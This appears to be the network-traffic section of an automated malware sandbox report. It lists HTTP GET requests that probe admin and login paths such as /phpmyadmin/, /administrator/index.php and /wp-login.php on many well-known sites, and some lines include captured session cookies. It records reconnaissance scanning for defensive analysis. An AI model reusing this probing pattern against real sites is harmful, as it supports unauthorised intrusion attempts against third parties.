                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: midetuvelocidad.claro.com.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.emis.gov.egAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: loopex.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: chainmine.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: phonandroid.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: followerstiktok.xyzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: servicossociais.caixa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ag.ufa9999.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pan.baidu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cloud.simplify3d.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eei.uniandes.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=cgp1DhR6xTi6CSaGmMluksYz60_fzOwniweAMszarPk-1707131690-1-AchVILVUeldhU0fUL/Sm+vJu4OVXbuNx6MuETCEChl7PvBHFckvoaEMvusYEOEObJusMfqXBe2SlFcG1v+KInlY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sigapbanjarmasin.infoAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hartico.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: virtuadopt.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=es_LA&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: login2.innova.puglia.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /en HTTP/1.1Host: genshin.mihoyo.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: srienlinea.sri.gob.ecAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: account.mojang.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: academico.um.edu.mxAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: store.steampowered.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: pl-pl.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipCookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoeUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/?locale=hi_IN&_rdr HTTP/1.1Host: m.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: lookaside.fbsbx.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: yellosa.co.zaAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/administrator/
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: app.plex.tvAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.0Host: signin.rockstargames.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EDDAF7B9110B0A46B575850AB86F0E3E0AEC9356593FDDBE1D721FD3E4C0BAB24User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: pt.secure.imvu.comAccept: */*Accept-Encoding: deflate, gzipCookie: osCsid=a1aabfac7a1f7e8705602ed881881037User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://us04web.zoom.us/wp-login.php
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.0Host: upsconline.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: zarkana2.roAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: bonga20120608=d4b62ea767f8c27a8f51fe1000153277; ts_type2=1; __cf_bm=sPKSaJvRUxAcg1PEcdR35O5GebQF9IpP_4Igj06Qn1U-1707131767-1-AfutacbLjRJXJ/HlVv4ccDZ2KwcLDrWfFrasoUlTJQoQXwrk+mYT9PLaGfsipxqCCZnwBC6f5dRn/AaHcx7pL3Q=; uh=IHSAIQqQLaWbpmumq0cKLxuvMUS0Hj==; fv=AmL3ZGZkAmN3ZD==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.binance.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hi-in.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mega.nz/wp-login.php
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: sport.autoplay.cloudAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: instructory.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: th-th.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: netizion.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: web.facebook.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: uh.isAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=WqiPd+MpAh7vehA+arozGXfDwGUAAAAAf0zscGSg46veBuMVqud6tA==; visid_incap_2786379=5tag4wo4T1GfIO+elp7EN3fDwGUAAAAAQUIPAAAAAAB4BLkAhZmiG4QXdfRN9Zxs; nlbi_2786379=xtV/OHOIMD7ou0OAaJQkpgAAAAAeL0CQftwLs0ZTw13GYZzvUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
